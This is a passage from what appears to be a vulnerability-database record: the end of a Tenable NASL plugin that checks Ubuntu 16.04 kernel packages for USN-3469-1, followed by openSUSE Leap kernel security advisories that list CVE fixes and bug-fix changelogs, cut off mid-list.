from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3469-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-aws\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-gke\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-kvm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-raspi2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-snapdragon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-aws\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-gke\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-kvm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-raspi2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-snapdragon\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/06/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/11/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2017-2019 Canonical, Inc. / NASL script (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(16\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 16.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2017-10911\", \"CVE-2017-12153\", \"CVE-2017-12154\", \"CVE-2017-12192\", \"CVE-2017-14051\", \"CVE-2017-14156\", \"CVE-2017-14340\", \"CVE-2017-14489\", \"CVE-2017-14991\", \"CVE-2017-15537\", \"CVE-2017-9984\", \"CVE-2017-9985\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-3469-1\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-4.4.0-1009-kvm\", pkgver:\"4.4.0-1009.14\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-4.4.0-1033-gke\", pkgver:\"4.4.0-1033.33\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-4.4.0-1039-aws\", pkgver:\"4.4.0-1039.48\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-4.4.0-1076-raspi2\", pkgver:\"4.4.0-1076.84\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-4.4.0-1078-snapdragon\", pkgver:\"4.4.0-1078.83\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-4.4.0-98-generic\", pkgver:\"4.4.0-98.121\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-4.4.0-98-generic-lpae\", pkgver:\"4.4.0-98.121\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-4.4.0-98-lowlatency\", pkgver:\"4.4.0-98.121\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-aws\", pkgver:\"4.4.0.1039.41\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-generic\", pkgver:\"4.4.0.98.103\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-generic-lpae\", pkgver:\"4.4.0.98.103\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-gke\", pkgver:\"4.4.0.1033.34\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-kvm\", pkgver:\"4.4.0.1009.9\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-lowlatency\", pkgver:\"4.4.0.98.103\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-raspi2\", pkgver:\"4.4.0.1076.76\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-snapdragon\", pkgver:\"4.4.0.1078.70\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-4.4-aws / linux-image-4.4-generic / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "suse": [{"lastseen": "2017-10-17T18:10:17", "bulletinFamily": "unix", "cvelist": ["CVE-2017-14489", "CVE-2017-1000252", "CVE-2017-12153", "CVE-2017-12154"], "description": "The openSUSE Leap 42.2 Kernel was updated to 4.4.90 to receive various\n security and bugfixes.\n\n\n The following security bugs were fixed:\n\n - CVE-2017-1000252: The KVM subsystem in the Linux kernel allowed guest OS\n users to cause a denial of service (assertion failure, and hypervisor\n hang or crash) via an out-of bounds guest_irq value, related to\n arch/x86/kvm/vmx.c and virt/kvm/eventfd.c (bnc#1058038).\n - CVE-2017-14489: The iscsi_if_rx function in\n drivers/scsi/scsi_transport_iscsi.c in the Linux kernel allowed local\n users to cause a denial of service (panic) by leveraging incorrect\n length validation (bnc#1059051).\n - CVE-2017-12153: A security flaw was discovered in the\n nl80211_set_rekey_data() function in net/wireless/nl80211.c in the Linux\n kernel This function did not check whether the required attributes are\n present in a Netlink request. This request can be issued by a user with\n the CAP_NET_ADMIN capability and may result in a NULL pointer\n dereference and system crash (bnc#1058410).\n - CVE-2017-12154: The prepare_vmcs02 function in arch/x86/kvm/vmx.c in the\n Linux kernel did not ensure that the "CR8-load exiting" and "CR8-store\n exiting" L0 vmcs02 controls exist in cases where L1 omits the "use TPR\n shadow" vmcs12 control, which allowed KVM L2 guest OS users to obtain\n read and write access to the hardware CR8 register (bnc#1058507).\n\n The following non-security bugs were fixed:\n\n - arc: Re-enable MMU upon Machine Check exception (bnc#1012382).\n - arm64: fault: Route pte translation faults via do_translation_fault\n (bnc#1012382).\n - arm64: Make sure SPsel is always set (bnc#1012382).\n - arm: pxa: add the number of DMA requestor lines (bnc#1012382).\n - arm: pxa: fix the number of DMA requestor lines (bnc#1012382).\n - bcache: correct cache_dirty_target in __update_writeback_rate()\n (bnc#1012382).\n - bcache: Correct return value for sysfs attach errors (bnc#1012382).\n - bcache: do not subtract sectors_to_gc for bypassed IO (bnc#1012382).\n - bcache: fix bch_hprint crash and improve output (bnc#1012382).\n - bcache: fix for gc and write-back race (bnc#1012382).\n - bcache: Fix leak of bdev reference (bnc#1012382).\n - bcache: initialize dirty stripes in flash_dev_run() (bnc#1012382).\n - blacklist.conf: Add commit b5accbb0dfae\n - blacklist.conf: add one more\n - block: Relax a check in blk_start_queue() (bnc#1012382).\n - bsg-lib: do not free job in bsg_prepare_job (bnc#1012382).\n - btrfs: change how we decide to commit transactions during flushing\n (bsc#1060197).\n - btrfs: fix NULL pointer dereference from free_reloc_roots()\n (bnc#1012382).\n - btrfs: prevent to set invalid default subvolid (bnc#1012382).\n - btrfs: propagate error to btrfs_cmp_data_prepare caller (bnc#1012382).\n - btrfs: qgroup: move noisy underflow warning to debugging build\n (bsc#1055755).\n - cifs: Fix SMB3.1.1 guest authentication to Samba (bnc#1012382).\n - cifs: release auth_key.response for reconnect (bnc#1012382).\n - crypto: AF_ALG - remove SGL terminator indicator when chaining\n (bnc#1012382).\n - crypto: talitos - Do not provide setkey for non hmac hashing algs\n (bnc#1012382).\n - crypto: talitos - fix sha224 (bnc#1012382).\n - cxl: Fix driver use count (bnc#1012382).\n - dmaengine: mmp-pdma: add number of requestors (bnc#1012382).\n - drm: Add driver-private objects to atomic state (bsc#1055493).\n - drm/dp: Introduce MST topology state to track available link bandwidth\n (bsc#1055493).\n - ext4: fix incorrect quotaoff if the quota feature is enabled\n (bnc#1012382).\n - ext4: fix quota inconsistency during orphan cleanup for read-only mounts\n (bnc#1012382).\n - f2fs: check hot_data for roll-forward recovery (bnc#1012382).\n - fix xen_swiotlb_dma_mmap prototype (bnc#1012382).\n - ftrace: Fix memleak when unregistering dynamic ops when tracing disabled\n (bnc#1012382).\n - ftrace: Fix selftest goto location on error (bnc#1012382).\n - genirq: Fix for_each_action_of_desc() macro (bsc#1061064).\n - getcwd: Close race with d_move called by lustre (bsc#1052593).\n - gfs2: Fix debugfs glocks dump (bnc#1012382).\n - gianfar: Fix Tx flow control deactivation (bnc#1012382).\n - hid: usbhid: Add HID_QUIRK_NOGET for Aten CS-1758 KVM switch\n (bnc#1022967).\n - input: i8042 - add Gigabyte P57 to the keyboard reset table\n (bnc#1012382).\n - iommu/vt-d: Avoid calling virt_to_phys() on null pointer (bsc#1061067).\n - ipv6: accept 64k - 1 packet length in ip6_find_1stfragopt()\n (bnc#1012382).\n - ipv6: add rcu grace period before freeing fib6_node (bnc#1012382).\n - ipv6: fix memory leak with multiple tables during netns destruction\n (bnc#1012382).\n - ipv6: fix sparse warning on rt6i_node (bnc#1012382).\n - ipv6: fix typo in fib6_net_exit() (bnc#1012382).\n - kabi/severities: ignore nfs_pgio_data_destroy\n - keys: fix writing past end of user-supplied buffer in keyring_read()\n (bnc#1012382).\n - keys: prevent creating a different user's keyrings (bnc#1012382).\n - keys: prevent KEYCTL_READ on negative key (bnc#1012382).\n - kvm: async_pf: Fix #DF due to inject "Page not Present" and "Page Ready"\n exceptions simultaneously (bsc#1061017).\n - kvm: PPC: Book3S: Fix race and leak in kvm_vm_ioctl_create_spapr_tce()\n (bnc#1012382).\n - kvm: SVM: Add a missing 'break' statement (bsc#1061017).\n - kvm: VMX: do not change SN bit in vmx_update_pi_irte() (bsc#1061017).\n - kvm: VMX: remove WARN_ON_ONCE in kvm_vcpu_trigger_posted_interrupt\n (bsc#1061017).\n - kvm: VMX: use cmpxchg64 (bnc#1012382).\n - mac80211: flush hw_roc_start work before cancelling the ROC\n (bnc#1012382).\n - md/bitmap: disable bitmap_resize for file-backed bitmaps (bsc#1061172).\n - md/raid5: preserve STRIPE_ON_UNPLUG_LIST in break_stripe_batch_list\n (bnc#1012382).\n - md/raid5: release/flush io in raid5_do_work() (bnc#1012382).\n - media: uvcvideo: Prevent heap overflow when accessing mapped controls\n (bnc#1012382).\n - media: v4l2-compat-ioctl32: Fix timespec conversion (bnc#1012382).\n - mips: math-emu: &lt;MAXA|MINA&gt;.&lt;D|S&gt;: Fix cases of both\n infinite inputs (bnc#1012382).\n - mips: math-emu: &lt;MAXA|MINA&gt;.&lt;D|S&gt;: Fix cases of input values\n with opposite signs (bnc#1012382).\n - mips: math-emu: &lt;MAX|MAXA|MIN|MINA&gt;.&lt;D|S&gt;: Fix cases of both\n inputs zero (bnc#1012382).\n - mips: math-emu: &lt;MAX|MAXA|MIN|MINA&gt;.&lt;D|S&gt;: Fix quiet NaN\n propagation (bnc#1012382).\n - mips: math-emu: &lt;MAX|MIN&gt;.&lt;D|S&gt;: Fix cases of both inputs\n negative (bnc#1012382).\n - mips: math-emu: MINA.&lt;D|S&gt;: Fix some cases of infinity and zero\n inputs (bnc#1012382).\n - mm: prevent double decrease of nr_reserved_highatomic (bnc#1012382).\n - nfsd: Fix general protection fault in release_lock_stateid()\n (bnc#1012382).\n - pci: Allow PCI express root ports to find themselves (bsc#1061046).\n - pci: fix oops when try to find Root Port for a PCI device (bsc#1061046).\n - pci: Fix race condition with driver_override (bnc#1012382).\n - pci: shpchp: Enable bridge bus mastering if MSI is enabled (bnc#1012382).\n - perf/x86: Fix RDPMC vs. mm_struct tracking (bsc#1061831).\n - perf/x86: kABI Workaround for 'perf/x86: Fix RDPMC vs. mm_struct\n tracking' (bsc#1061831).\n - powerpc: Fix DAR reporting when alignment handler faults (bnc#1012382).\n - powerpc/pseries: Fix parent_dn reference leak in add_dt_node()\n (bnc#1012382).\n - qlge: avoid memcpy buffer overflow (bnc#1012382).\n - Revert "net: fix percpu memory leaks" (bnc#1012382).\n - Revert "net: phy: Correctly process PHY_HALTED in phy_stop_machine()"\n (bnc#1012382).\n - Revert "net: use lib/percpu_counter API for fragmentation mem\n accounting" (bnc#1012382).\n - scsi: ILLEGAL REQUEST + ASC==27 =&gt; target failure (bsc#1059465).\n - scsi: megaraid_sas: Check valid aen class range to avoid kernel panic\n (bnc#1012382).\n - scsi: megaraid_sas: Return pended IOCTLs with cmd_status\n MFI_STAT_WRONG_STATE in case adapter is dead (bnc#1012382).\n - scsi: sg: factor out sg_fill_request_table() (bnc#1012382).\n - scsi: sg: fixup infoleak when using SG_GET_REQUEST_TABLE (bnc#1012382).\n - scsi: sg: off by one in sg_ioctl() (bnc#1012382).\n - scsi: sg: remove 'save_scat_len' (bnc#1012382).\n - scsi: sg: use standard lists for sg_requests (bnc#1012382).\n - scsi: storvsc: fix memory leak on ring buffer busy (bnc#1012382).\n - scsi: zfcp: add handling for FCP_RESID_OVER to the fcp ingress path\n (bnc#1012382).\n - scsi: zfcp: fix capping of unsuccessful GPN_FT SAN response trace\n records (bnc#1012382).\n - scsi: zfcp: fix missing trace records for early returns in TMF eh\n handlers (bnc#1012382).\n - scsi: zfcp: fix passing fsf_req to SCSI trace on TMF to correlate with\n HBA (bnc#1012382).\n - scsi: zfcp: fix payload with full FCP_RSP IU in SCSI trace records\n (bnc#1012382).\n - scsi: zfcp: fix queuecommand for scsi_eh commands when DIX enabled\n (bnc#1012382).\n - scsi: zfcp: trace HBA FSF response by default on dismiss or timedout\n late response (bnc#1012382).\n - scsi: zfcp: trace high part of "new" 64 bit SCSI LUN (bnc#1012382).\n - seccomp: fix the usage of get/put_seccomp_filter() in\n seccomp_get_filter() (bnc#1012382).\n - skd: Avoid that module unloading triggers a use-after-free (bnc#1012382).\n - skd: Submit requests to firmware before triggering the doorbell\n (bnc#1012382).\n - smb3: Do not ignore O_SYNC/O_DSYNC and O_DIRECT flags (bnc#1012382).\n - smb: Validate negotiate (to protect against downgrade) even if signing\n off (bnc#1012382).\n - swiotlb-xen: implement xen_swiotlb_dma_mmap callback (bnc#1012382).\n - timer/sysclt: Restrict timer migration sysctl values to 0 and 1\n (bnc#1012382).\n - tracing: Apply trace_clock changes to instance max buffer (bnc#1012382).\n - tracing: Erase irqsoff trace with empty write (bnc#1012382).\n - tracing: Fix trace_pipe behavior for instance traces (bnc#1012382).\n - tty: fix __tty_insert_flip_char regression (bnc#1012382).\n - tty: improve tty_insert_flip_char() fast path (bnc#1012382).\n - tty: improve tty_insert_flip_char() slow path (bnc#1012382).\n - vfs: Return -ENXIO for negative SEEK_HOLE / SEEK_DATA offsets\n (bnc#1012382).\n - video: fbdev: aty: do not leak uninitialized padding in clk to userspace\n (bnc#1012382).\n - Workaround for kABI compatibility with DP-MST patches (bsc#1055493).\n - x86/fpu: Do not let userspace set bogus xcomp_bv (bnc#1012382).\n - x86/fsgsbase/64: Report FSBASE and GSBASE correctly in core dumps\n (bnc#1012382).\n - x86/ldt: Fix off by one in get_segment_base() (bsc#1061872).\n - xfs/dmapi: fix incorrect file-&gt;f_path.dentry-&gt;d_inode usage\n (bsc#1055896).\n\n", "edition": 1, "modified": "2017-10-17T15:09:40", "published": "2017-10-17T15:09:40", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-10/msg00018.html", "id": "OPENSUSE-SU-2017:2739-1", "type": "suse", "title": "Security update for the Linux Kernel (important)", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2017-10-17T18:10:17", "bulletinFamily": "unix", "cvelist": ["CVE-2017-14489", "CVE-2017-1000252", "CVE-2017-12153", "CVE-2017-12154"], "description": "The openSUSE Leap 42.3 kernel was updated to 4.4.90 to receive various\n security and bugfixes.\n\n The following security bugs were fixed:\n\n - CVE-2017-1000252: The KVM subsystem in the Linux kernel allowed guest OS\n users to cause a denial of service (assertion failure, and hypervisor\n hang or crash) via an out-of bounds guest_irq value, related to\n arch/x86/kvm/vmx.c and virt/kvm/eventfd.c (bnc#1058038).\n - CVE-2017-14489: The iscsi_if_rx function in\n drivers/scsi/scsi_transport_iscsi.c in the Linux kernel allowed local\n users to cause a denial of service (panic) by leveraging incorrect\n length validation (bnc#1059051).\n - CVE-2017-12153: A security flaw was discovered in the\n nl80211_set_rekey_data() function in net/wireless/nl80211.c in the Linux\n kernel This function did not check whether the required attributes are\n present in a Netlink request. This request can be issued by a user with\n the CAP_NET_ADMIN capability and may result in a NULL pointer\n dereference and system crash (bnc#1058410).\n - CVE-2017-12154: The prepare_vmcs02 function in arch/x86/kvm/vmx.c in the\n Linux kernel did not ensure that the "CR8-load exiting" and "CR8-store\n exiting" L0 vmcs02 controls exist in cases where L1 omits the "use TPR\n shadow" vmcs12 control, which allowed KVM L2 guest OS users to obtain\n read and write access to the hardware CR8 register (bnc#1058507).\n\n The following non-security bugs were fixed:\n\n - arc: Re-enable MMU upon Machine Check exception (bnc#1012382).\n - arm64: fault: Route pte translation faults via do_translation_fault\n (bnc#1012382).\n - arm64: Make sure SPsel is always set (bnc#1012382).\n - arm: pxa: add the number of DMA requestor lines (bnc#1012382).\n - arm: pxa: fix the number of DMA requestor lines (bnc#1012382).\n - bcache: correct cache_dirty_target in __update_writeback_rate()\n (bnc#1012382).\n - bcache: Correct return value for sysfs attach errors (bnc#1012382).\n - bcache: do not subtract sectors_to_gc for bypassed IO (bnc#1012382).\n - bcache: fix bch_hprint crash and improve output (bnc#1012382).\n - bcache: fix for gc and write-back race (bnc#1012382).\n - bcache: Fix leak of bdev reference (bnc#1012382).\n - bcache: initialize dirty stripes in flash_dev_run() (bnc#1012382).\n - block: Relax a check in blk_start_queue() (bnc#1012382).\n - bsg-lib: do not free job in bsg_prepare_job (bnc#1012382).\n - btrfs: change how we decide to commit transactions during flushing\n (bsc#1060197).\n - btrfs: fix NULL pointer dereference from free_reloc_roots()\n (bnc#1012382).\n - btrfs: prevent to set invalid default subvolid (bnc#1012382).\n - btrfs: propagate error to btrfs_cmp_data_prepare caller (bnc#1012382).\n - btrfs: qgroup: move noisy underflow warning to debugging build\n (bsc#1055755).\n - cifs: Fix SMB3.1.1 guest authentication to Samba (bnc#1012382).\n - cifs: release auth_key.response for reconnect (bnc#1012382).\n - crypto: AF_ALG - remove SGL terminator indicator when chaining\n (bnc#1012382).\n - crypto: talitos - Do not provide setkey for non hmac hashing algs\n (bnc#1012382).\n - crypto: talitos - fix sha224 (bnc#1012382).\n - cxl: Fix driver use count (bnc#1012382).\n - dmaengine: mmp-pdma: add number of requestors (bnc#1012382).\n - drivers: net: phy: xgene: Fix mdio write (bsc#1057383).\n - drm: Add driver-private objects to atomic state (bsc#1055493).\n - drm/dp: Introduce MST topology state to track available link bandwidth\n (bsc#1055493).\n - efi/fb: Avoid reconfiguration of BAR that covers the framebuffer\n (bsc#1051987).\n - efi/fb: Correct PCI_STD_RESOURCE_END usage (bsc#1051987).\n - ext4: fix incorrect quotaoff if the quota feature is enabled\n (bnc#1012382).\n - ext4: fix quota inconsistency during orphan cleanup for read-only mounts\n (bnc#1012382).\n - f2fs: check hot_data for roll-forward recovery (bnc#1012382).\n - fix xen_swiotlb_dma_mmap prototype (bnc#1012382).\n - ftrace: Fix memleak when unregistering dynamic ops when tracing disabled\n (bnc#1012382).\n - ftrace: Fix selftest goto location on error (bnc#1012382).\n - genirq: Fix for_each_action_of_desc() macro (bsc#1061064).\n - getcwd: Close race with d_move called by lustre (bsc#1052593).\n - gfs2: Fix debugfs glocks dump (bnc#1012382).\n - gianfar: Fix Tx flow control deactivation (bnc#1012382).\n - hid: usbhid: Add HID_QUIRK_NOGET for Aten CS-1758 KVM switch\n (bnc#1022967).\n - input: i8042 - add Gigabyte P57 to the keyboard reset table\n (bnc#1012382).\n - iommu/vt-d: Avoid calling virt_to_phys() on null pointer (bsc#1061067).\n - ipv6: accept 64k - 1 packet length in ip6_find_1stfragopt()\n (bnc#1012382).\n - ipv6: add rcu grace period before freeing fib6_node (bnc#1012382).\n - ipv6: fix memory leak with multiple tables during netns destruction\n (bnc#1012382).\n - ipv6: fix sparse warning on rt6i_node (bnc#1012382).\n - ipv6: fix typo in fib6_net_exit() (bnc#1012382).\n - iw_cxgb4: put ep reference in pass_accept_req() (fate#321658 bsc#1005778\n fate#321660 bsc#1005780 fate#321661 bsc#1005781).\n - KABI fix drivers/nvme/target/nvmet.h (bsc#1058550).\n - kabi/severities: ignore nfs_pgio_data_destroy\n - kABI: Workaround kABI breakage of AMD-AVIC fixes (bsc#1044503).\n - keys: fix writing past end of user-supplied buffer in keyring_read()\n (bnc#1012382).\n - keys: prevent creating a different user's keyrings (bnc#1012382).\n - keys: prevent KEYCTL_READ on negative key (bnc#1012382).\n - kvm: Add struct kvm_vcpu pointer parameter to get_enable_apicv()\n (bsc#1044503).\n - kvm: async_pf: Fix #DF due to inject "Page not Present" and "Page Ready"\n exceptions simultaneously (bsc#1061017).\n - kvm: PPC: Book3S: Fix race and leak in kvm_vm_ioctl_create_spapr_tce()\n (bnc#1012382).\n - kvm: SVM: Add a missing 'break' statement (bsc#1061017).\n - kvm: SVM: Add irqchip_split() checks before enabling AVIC (bsc#1044503).\n - kvm: SVM: delete avic_vm_id_bitmap (2 megabyte static array)\n (bsc#1059500).\n - kvm: SVM: Refactor AVIC vcpu initialization into avic_init_vcpu()\n (bsc#1044503).\n - kvm: VMX: do not change SN bit in vmx_update_pi_irte() (bsc#1061017).\n - kvm: VMX: remove WARN_ON_ONCE in kvm_vcpu_trigger_posted_interrupt\n (bsc#1061017).\n - kvm: VMX: use cmpxchg64 (bnc#1012382).\n - mac80211: flush hw_roc_start work before cancelling the ROC\n (bnc#1012382).\n - md/bitmap: disable bitmap_resize for file-backed bitmaps (bsc#1061172).\n - md/raid5: preserve STRIPE_ON_UNPLUG_LIST in break_stripe_batch_list\n (bnc#1012382).\n - md/raid5: release/flush io in raid5_do_work() (bnc#1012382).\n - media: uvcvideo: Prevent heap overflow when accessing mapped controls\n (bnc#1012382).\n - media: v4l2-compat-ioctl32: Fix timespec conversion (bnc#1012382).\n - mips: math-emu: <MAXA|MINA>.<D|S>: Fix cases of both infinite inputs\n (bnc#1012382).\n - mips: math-emu: <MAXA|MINA>.<D|S>: Fix cases of input values with\n opposite signs (bnc#1012382).\n - mips: math-emu: <MAX|MAXA|MIN|MINA>.<D|S>: Fix cases of both inputs zero\n (bnc#1012382).\n - mips: math-emu: <MAX|MAXA|MIN|MINA>.<D|S>: Fix quiet NaN propagation\n (bnc#1012382).\n - mips: math-emu: <MAX|MIN>.<D|S>: Fix cases of both inputs negative\n (bnc#1012382).\n - mips: math-emu: MINA.<D|S>: Fix some cases of infinity and zero inputs\n (bnc#1012382).\n - mm: prevent double decrease of nr_reserved_highatomic (bnc#1012382).\n - nfsd: Fix general protection fault in release_lock_stateid()\n (bnc#1012382).\n - nvme-fabrics: generate spec-compliant UUID NQNs (bsc#1057498).\n - nvmet: Move serial number from controller to subsystem (bsc#1058550).\n - nvmet: preserve controller serial number between reboots (bsc#1058550).\n - pci: Allow PCI express root ports to find themselves (bsc#1061046).\n - pci: fix oops when try to find Root Port for a PCI device (bsc#1061046).\n - pci: Fix race condition with driver_override (bnc#1012382).\n - pci: Mark AMD Stoney GPU ATS as broken (bsc#1061046).\n - pci: shpchp: Enable bridge bus mastering if MSI is enabled (bnc#1012382).\n - perf/x86: Fix RDPMC vs. mm_struct tracking (bsc#1061831).\n - perf/x86: kABI Workaround for 'perf/x86: Fix RDPMC vs. mm_struct\n tracking' (bsc#1061831).\n - perf: xgene: Add APM X-Gene SoC Performance Monitoring Unit driver\n (bsc#1036737).\n - perf: xgene: Include module.h (bsc#1036737).\n - perf: xgene: Move PMU leaf functions into function pointer structure\n (bsc#1036737).\n - perf: xgene: Parse PMU subnode from the match table (bsc#1036737).\n - powerpc: Fix DAR reporting when alignment handler faults (bnc#1012382).\n - powerpc/perf: Cleanup of PM_BR_CMPL vs. PM_BRU_CMPL in Power9 event list\n (bsc#1056686, fate#321438, bsc#1047238, git-fixes 34922527a2bc).\n - powerpc/perf: Factor out PPMU_ONLY_COUNT_RUN check code from power8\n (fate#321438, bsc#1053043, git-fixes efe881afdd999).\n - powerpc/pseries: Fix parent_dn reference leak in add_dt_node()\n (bnc#1012382).\n - qlge: avoid memcpy buffer overflow (bnc#1012382).\n - rdma/bnxt_re: Allocate multiple notification queues (bsc#1037579).\n - rdma/bnxt_re: Implement the alloc/get_hw_stats callback (bsc#1037579).\n - Revert "net: fix percpu memory leaks" (bnc#1012382).\n - Revert "net: phy: Correctly process PHY_HALTED in phy_stop_machine()"\n (bnc#1012382).\n - Revert "net: use lib/percpu_counter API for fragmentation mem\n accounting" (bnc#1012382).\n - Revert "Update\n patches.fixes/xfs-refactor-log-record-unpack-and-data-processing.patch\n (bsc#1043598, bsc#1036215)."\n - Revert "xfs: detect and handle invalid iclog size set by mkfs\n (bsc#1043598)."\n - Revert "xfs: detect and trim torn writes during log recovery\n (bsc#1036215)."\n - Revert "xfs: refactor and open code log record crc check (bsc#1036215)."\n - Revert "xfs: refactor log record start detection into a new helper\n (bsc#1036215)."\n - Revert "xfs: return start block of first bad log record during recovery\n (bsc#1036215)."\n - Revert "xfs: support a crc verification only log record pass\n (bsc#1036215)."\n - scsi: ILLEGAL REQUEST + ASC==27 =&gt; target failure (bsc#1059465).\n - scsi: megaraid_sas: Check valid aen class range to avoid kernel panic\n (bnc#1012382).\n - scsi: megaraid_sas: Return pended IOCTLs with cmd_status\n MFI_STAT_WRONG_STATE in case adapter is dead (bnc#1012382).\n - scsi: sg: factor out sg_fill_request_table() (bnc#1012382).\n - scsi: sg: fixup infoleak when using SG_GET_REQUEST_TABLE (bnc#1012382).\n - scsi: sg: off by one in sg_ioctl() (bnc#1012382).\n - scsi: sg: remove 'save_scat_len' (bnc#1012382).\n - scsi: sg: use standard lists for sg_requests (bnc#1012382).\n - scsi: storvsc: fix memory leak on ring buffer busy (bnc#1012382).\n - scsi_transport_fc: Also check for NOTPRESENT in fc_remote_port_add()\n (bsc#1037890).\n - scsi: zfcp: add handling for FCP_RESID_OVER to the fcp ingress path\n (bnc#1012382).\n - scsi: zfcp: fix capping of unsuccessful GPN_FT SAN response trace\n records (bnc#1012382).\n - scsi: zfcp: fix missing trace 